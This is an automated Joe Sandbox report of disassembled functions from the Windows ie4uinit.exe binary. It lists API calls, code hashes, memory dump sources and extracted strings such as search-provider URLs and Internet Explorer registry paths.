Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$ContextCryptProcess$AcquireFreeRelease
String ID:
API String ID: 3796240942-0
Opcode ID: f5e509d1d66287f27a15449c92e3f995700201e7c74088af193ba978adb063d0
Instruction ID: b0d7d84795bc3754c2f40fb3c47e911ffdea7a3da6423f5417c1ac2848939cb2
Opcode Fuzzy Hash: f5e509d1d66287f27a15449c92e3f995700201e7c74088af193ba978adb063d0
Instruction Fuzzy Hash: 7021712AA1B65281EB598F19DA103B962A0AF84F84F088534DB5D8B69ECF7FDC118350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5221F14 Relevance: 1.6, APIs: 1, Instructions: 86timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6B5221FD2

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 2feced8ed1a6935a059fb3f869a6a4bba4b34826cbadbfae715c7d99de840c20
Instruction ID: 48b404dd5d1cb12681d26fc50cc4f00ae97f9047052c69674d13c24328ccff3e
Opcode Fuzzy Hash: 2feced8ed1a6935a059fb3f869a6a4bba4b34826cbadbfae715c7d99de840c20
Instruction Fuzzy Hash: 72318D29A1E78241FA208B19DA903EA6361EF54F84F044136DB4D8779EDF7FEE46C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5222550 Relevance: 1.5, APIs: 1, Instructions: 29encryptionCOMMONLIBRARYCODE

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,?,?,00007FF6B5222534), ref: 00007FF6B5222593

Part of subcall function 00007FF6B5211698: GetProcessHeap.KERNEL32 ref: 00007FF6B52116A5
Part of subcall function 00007FF6B5211698: HeapFree.KERNEL32 ref: 00007FF6B52116B3

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$ContextCryptFreeProcessRelease
String ID:
API String ID: 2055178999-0
Opcode ID: 80669131ca7073641c0fe89143d468b6609352c1ad61234630c73b6df6470dec
Instruction ID: 9ef9e0f7c82a93b425227ca1edebc7d810af4dc4613139d8b353359d4c4cb51c
Opcode Fuzzy Hash: 80669131ca7073641c0fe89143d468b6609352c1ad61234630c73b6df6470dec
Instruction Fuzzy Hash: 59F03125B17B4689EF599F59EA903B823A4AF48F44F588535DB0D8631ADF3ED8618300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215674 Relevance: 1.5, APIs: 1, Instructions: 25comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,?,?,?,?,00007FF6B521288D), ref: 00007FF6B5215698

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 4489e6c7e959adee8b53ebd6c0d28c546cd5a20287eb45884badf9e8ecdc90ea
Instruction ID: 92e94ad6ce6b707d149aba9e9e4129aff642375bd0390dd64e054b548588833e
Opcode Fuzzy Hash: 4489e6c7e959adee8b53ebd6c0d28c546cd5a20287eb45884badf9e8ecdc90ea
Instruction Fuzzy Hash: FCF0A42AB19A4A86EB109B29E9801A97374FB88F54B144072DF4D83379DF3DE949CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5211670 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 26046757cd1809d3860b1c4a81426ba6468fbae7af0e506c6bafef64779eb471
Instruction ID: 61109b28b3f04afe1cabe17513a9698686f4bf9b8738b4e99547f83737c08da4
Opcode Fuzzy Hash: 26046757cd1809d3860b1c4a81426ba6468fbae7af0e506c6bafef64779eb471
Instruction Fuzzy Hash: 96C08C00A5674689E6242B927E101A40294BB0EF80F080034CF084A306CC3CA88B4300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52320C0 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e19bb8407c61e34a1c47f5836692da4dcdc1168991121e7300244e00ac3f58
Instruction ID: 82e0f835aa9a9839fd79e255aabd4db2effa518367415e349a483134cbbbe018
Opcode Fuzzy Hash: 70e19bb8407c61e34a1c47f5836692da4dcdc1168991121e7300244e00ac3f58
Instruction Fuzzy Hash: 9312B4B7F3841047D72DCB19EC52FA976A2B7A4348749A02CA607D3F44EA3DFE158A44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5220C4C Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22c889bcac4f057fb753f854cf6cb558e54d618642e06831f7a1660cd20aff9
Instruction ID: fbe31e0b5fad4f70bba15c0c1a789c312061b2021caf48862c5d1b1ebb73b033
Opcode Fuzzy Hash: b22c889bcac4f057fb753f854cf6cb558e54d618642e06831f7a1660cd20aff9
Instruction Fuzzy Hash: 22A14936B1AA458BEB19CFB9C9402ED33B2BB48B58B044535DF0DA7B5ADF35E8148740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5233330 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03af0761061c05c8087de23d13a430ad1254f8bc16d93bf78891331ee02789e6
Instruction ID: 9c4b7c5b0e2262d05f139a1e6aee5036fa28283243719b4e72d927a4fda4c26d
Opcode Fuzzy Hash: 03af0761061c05c8087de23d13a430ad1254f8bc16d93bf78891331ee02789e6
Instruction Fuzzy Hash: AD413432B305254AD71C4E3C5B2791DDD9E93C5380F90F93AE686CBFADD83AD9118A80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52331A8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8601153844eb919040d69870f82575c3ddd0f300710fa1108b9e361430ee609
Instruction ID: 153b013375f02c4ce0e62da3df0b76b0a17ef1f0bdad7566fb867cabe12d39fa
Opcode Fuzzy Hash: a8601153844eb919040d69870f82575c3ddd0f300710fa1108b9e361430ee609
Instruction Fuzzy Hash: 0C314C7BF301614BC71D4E3CAB1751DA98E93D5380780B93AE646CBFD9D93AE9128B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215BBC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 158processfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

memset.MSVCRT ref: 00007FF6B5215C1C
CreateFileW.KERNEL32 ref: 00007FF6B5215C8C
GetCurrentProcess.KERNEL32 ref: 00007FF6B5215C9F
GetCurrentProcess.KERNEL32 ref: 00007FF6B5215CA8
DuplicateHandle.KERNEL32 ref: 00007FF6B5215CD1
GetStdHandle.KERNEL32 ref: 00007FF6B5215CE4
CreateProcessW.KERNEL32 ref: 00007FF6B5215D3C
WaitForSingleObject.KERNEL32 ref: 00007FF6B5215D4F
GetLastError.KERNEL32 ref: 00007FF6B5215D60
CloseHandle.KERNEL32 ref: 00007FF6B5215D76
GetLastError.KERNEL32 ref: 00007FF6B5215D80
GetLastError.KERNEL32 ref: 00007FF6B5215DA2
GetExitCodeProcess.KERNEL32 ref: 00007FF6B5215DCD
GetLastError.KERNEL32 ref: 00007FF6B5215DE4
CloseHandle.KERNEL32 ref: 00007FF6B5215E03
CloseHandle.KERNEL32 ref: 00007FF6B5215E0D
CloseHandle.KERNEL32 ref: 00007FF6B5215E21
CloseHandle.KERNEL32 ref: 00007FF6B5215E34
CloseHandle.KERNEL32 ref: 00007FF6B5215E47

Strings

Command line returned: %1!lx!, xrefs: 00007FF6B5215DA8
Unable to get exit code. Error: 0x%1!08lx!, xrefs: 00007FF6B5215DED
Output will be redirected to: %1, xrefs: 00007FF6B5215CEF
Command line returned: 0x%1!08lx!, xrefs: 00007FF6B5215DDB
Launching command line to remove package: %1, xrefs: 00007FF6B5215C02

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Handle$Close$ErrorLastProcess$CreateCurrentMessage$CodeDuplicateExitFileFormatLocalObjectPostSingleThreadTimeWaitmemset
String ID: Command line returned: %1!lx!$Command line returned: 0x%1!08lx!$Launching command line to remove package: %1$Output will be redirected to: %1$Unable to get exit code. Error: 0x%1!08lx!
API String ID: 2537296607-2439298233
Opcode ID: 6b005c0ef74591061345ab3da23c0140c5bcfc2fa7b98073b2657a110d3ccc81
Instruction ID: 3ced94ac950c7aeafcd7c073c3f31f8b460f787cb583e6a86e20d8b45a7ffe06
Opcode Fuzzy Hash: 6b005c0ef74591061345ab3da23c0140c5bcfc2fa7b98073b2657a110d3ccc81
Instruction Fuzzy Hash: B6714C32B0AA128AE7209F64EA442ED33B5FB44B98F000175DE4D97A5EDF3DE945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5221B4C Relevance: 40.4, APIs: 1, Strings: 22, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B521B35C: LoadLibraryW.KERNEL32 ref: 00007FF6B521B38D
Part of subcall function 00007FF6B521B35C: GetProcAddress.KERNEL32 ref: 00007FF6B521B3AE
Part of subcall function 00007FF6B521B35C: FreeLibrary.KERNEL32 ref: 00007FF6B521B3D0

LocaleNameToLCID.KERNEL32(?,?,?,?,?,?,?,00007FF6B521DFE9), ref: 00007FF6B5221DF7

Strings

https://www.haosou.com/s?src=win10&ie=utf-8&q={searchTerms}, xrefs: 00007FF6B5221BC6
https://yandex.ua/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C54
https://suggest.yandex.ru/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C79
https://yandex.by/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C4B
Yandex, xrefs: 00007FF6B5221CBB
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C8B
https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630, xrefs: 00007FF6B5221C9D
http://www.yandex.com/favicon.ico, xrefs: 00007FF6B5221CE2
http://www.yandex.com.tr/favicon.ico, xrefs: 00007FF6B5221DE2
{461B4783-36F5-45B9-883E-35BA5ED4A823}, xrefs: 00007FF6B5221BBF
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query={searchTerms}, xrefs: 00007FF6B5221BE3
https://yandex.ru/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C39
{64AF4D11-6492-4C25-B014-B6C6CEE3B0C5}, xrefs: 00007FF6B5221E04
!x-sys-default-locale, xrefs: 00007FF6B5221DF0
{2562B2EF-500D-49FC-A350-5BC0D4C56EE3}, xrefs: 00007FF6B5221BDC
{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}, xrefs: 00007FF6B5221C18
http://www.baidu.com/favicon.ico, xrefs: 00007FF6B5221E1F
https://yandex.kz/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C42
https://yandex.com.tr/search/?text={searchTerms}&clid=2233630, xrefs: 00007FF6B5221C5D
https://www.baidu.com/s?tn=80035161_2_dg&wd={searchTerms}, xrefs: 00007FF6B5221E11
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C94
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF6B5221C82

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Library$AddressFreeLoadLocaleNameProc
String ID: !x-sys-default-locale$Yandex$http://www.baidu.com/favicon.ico$http://www.yandex.com.tr/favicon.ico$http://www.yandex.com/favicon.ico$https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630$https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://suggest.yandex.ru/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://www.baidu.com/s?tn=80035161_2_dg&wd={searchTerms}$https://www.haosou.com/s?src=win10&ie=utf-8&q={searchTerms}$https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query={searchTerms}$https://yandex.by/search/?text={searchTerms}&clid=2233627$https://yandex.com.tr/search/?text={searchTerms}&clid=2233630$https://yandex.kz/search/?text={searchTerms}&clid=2233627$https://yandex.ru/search/?text={searchTerms}&clid=2233627$https://yandex.ua/search/?text={searchTerms}&clid=2233627${2562B2EF-500D-49FC-A350-5BC0D4C56EE3}${461B4783-36F5-45B9-883E-35BA5ED4A823}${64AF4D11-6492-4C25-B014-B6C6CEE3B0C5}${8C3078A0-9AAB-4371-85D1-656CA8E46EE8}
API String ID: 2433311555-3546315627
Opcode ID: f81edb1bca117721a08df49f25c76aa5d5ed300d6daac04b66eb9647b83dbaec
Instruction ID: c5bed2df9b2ee401c980831f342f5ea07caee6e885ec97034a24768c91b6af85
Opcode Fuzzy Hash: f81edb1bca117721a08df49f25c76aa5d5ed300d6daac04b66eb9647b83dbaec
Instruction Fuzzy Hash: 9A91FD2AA1A94695EB649F2DDE404F82761FB44F84B944036DB0DC37AEDE3EED49C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52260C0 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 259memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5221154: #57.IERTUTIL ref: 00007FF6B52211A4
Part of subcall function 00007FF6B5221154: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B52211CA
Part of subcall function 00007FF6B5221154: SysAllocString.OLEAUT32 ref: 00007FF6B52211F0
Part of subcall function 00007FF6B5221154: RegOpenKeyExW.ADVAPI32 ref: 00007FF6B522122D
Part of subcall function 00007FF6B5221154: RegGetValueW.ADVAPI32 ref: 00007FF6B522126B
Part of subcall function 00007FF6B5221154: RegCloseKey.ADVAPI32 ref: 00007FF6B5221293
Part of subcall function 00007FF6B5221154: SysStringLen.OLEAUT32 ref: 00007FF6B52212C9
Part of subcall function 00007FF6B5221154: memcpy_s.MSVCRT ref: 00007FF6B52212EE

SysFreeString.OLEAUT32 ref: 00007FF6B5226228

Part of subcall function 00007FF6B52273D0: CryptCreateHash.ADVAPI32 ref: 00007FF6B522741F
Part of subcall function 00007FF6B52273D0: CryptHashData.ADVAPI32 ref: 00007FF6B5227437
Part of subcall function 00007FF6B52273D0: CryptGetHashParam.ADVAPI32 ref: 00007FF6B5227460
Part of subcall function 00007FF6B52273D0: CryptDestroyHash.ADVAPI32 ref: 00007FF6B5227487

SysAllocString.OLEAUT32 ref: 00007FF6B522633B
SysFreeString.OLEAUT32 ref: 00007FF6B522637F
SysStringLen.OLEAUT32 ref: 00007FF6B5226388
VarBstrCat.OLEAUT32 ref: 00007FF6B52263A1
SysFreeString.OLEAUT32 ref: 00007FF6B52263B0
SysStringByteLen.OLEAUT32 ref: 00007FF6B52263CA
SysAllocStringByteLen.OLEAUT32 ref: 00007FF6B52263D5

Part of subcall function 00007FF6B5231558: SysAllocString.OLEAUT32 ref: 00007FF6B5231601

SysFreeString.OLEAUT32 ref: 00007FF6B52263F5
SysFreeString.OLEAUT32 ref: 00007FF6B5226405

Part of subcall function 00007FF6B5231558: SysFreeString.OLEAUT32 ref: 00007FF6B523162F

Part of subcall function 00007FF6B5211698: GetProcessHeap.KERNEL32 ref: 00007FF6B52116A5
Part of subcall function 00007FF6B5211698: HeapFree.KERNEL32 ref: 00007FF6B52116B3

Strings

rid, xrefs: 00007FF6B5226212
<?xml version="1.0" encoding="utf-8"?>, xrefs: 00007FF6B5226334
hashvalue, xrefs: 00007FF6B522629D
thumbprint, xrefs: 00007FF6B52262E3
product, xrefs: 00007FF6B5226192
<request/>, xrefs: 00007FF6B5226150
trademark, xrefs: 00007FF6B52261B3
type, xrefs: 00007FF6B52261E6
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF6B52260C9
source, xrefs: 00007FF6B522630B
euppid, xrefs: 00007FF6B52261CD

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$AllocCryptHash$ByteHeap$BstrCloseConvertCreateDataDestroyOpenParamProcessValuememcpy_s
String ID: <?xml version="1.0" encoding="utf-8"?>$<request/>$euppid$hashvalue$https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP$product$rid$source$thumbprint$trademark$type
API String ID: 534182030-1803989589
Opcode ID: e99523cb5efc2009168f5d80913c32bb41b5871ee4e76d9242a70470dec59846
Instruction ID: 7475c30a8ae409e0dab9c145b0655b92af0f26d9965b3e91b97d10d7e3008a88
Opcode Fuzzy Hash: e99523cb5efc2009168f5d80913c32bb41b5871ee4e76d9242a70470dec59846
Instruction Fuzzy Hash: 17B12826B16A5789FB149B69DE503FC2761AF44F88F550035CF0EAB69ADE39FC068340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5216040 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 227memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00007FF6B521608F
VariantInit.OLEAUT32 ref: 00007FF6B52160A1
VariantInit.OLEAUT32 ref: 00007FF6B52160BD
VariantInit.OLEAUT32 ref: 00007FF6B52160DA
VariantInit.OLEAUT32 ref: 00007FF6B52160F8
VariantClear.OLEAUT32 ref: 00007FF6B5216140
VariantClear.OLEAUT32 ref: 00007FF6B5216153
VariantClear.OLEAUT32 ref: 00007FF6B5216165
VariantClear.OLEAUT32 ref: 00007FF6B5216177

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

SysAllocString.OLEAUT32 ref: 00007FF6B52161BD
SysFreeString.OLEAUT32 ref: 00007FF6B521620B
SHRegGetUSValueW.SHLWAPI ref: 00007FF6B52162C3
SysAllocString.OLEAUT32 ref: 00007FF6B52162F3
SysFreeString.OLEAUT32 ref: 00007FF6B521633D
SHRegDeleteUSValueW.SHLWAPI ref: 00007FF6B5216376

Strings

\Microsoft\Internet Explorer, xrefs: 00007FF6B52161AF
Software\Microsoft\Internet Explorer\Setup, xrefs: 00007FF6B5216263, 00007FF6B521636F
`, xrefs: 00007FF6B5216278
CleanupTask, xrefs: 00007FF6B5216255, 00007FF6B5216368

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Variant$ClearInitString$AllocFreeValue$CreateDeleteHeapInstanceProcess
String ID: CleanupTask$Software\Microsoft\Internet Explorer\Setup$\Microsoft\Internet Explorer$`
API String ID: 897810773-2320231753
Opcode ID: 143230e032f696f2904f7df03b713a40c3903dd36b126ea5d91d8231c8fd185a
Instruction ID: 598f5071726bb09c92375dd559b4b4bfd7ca1b7b9a1ac9c474323f3b6f11cfe4
Opcode Fuzzy Hash: 143230e032f696f2904f7df03b713a40c3903dd36b126ea5d91d8231c8fd185a
Instruction Fuzzy Hash: 0DB19222A0AA9689FB158F28DA513ED63B0FF44F44F144135DB4D87A6ADF3EE946C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F9DC Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF6B522DC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF6B522FA0E
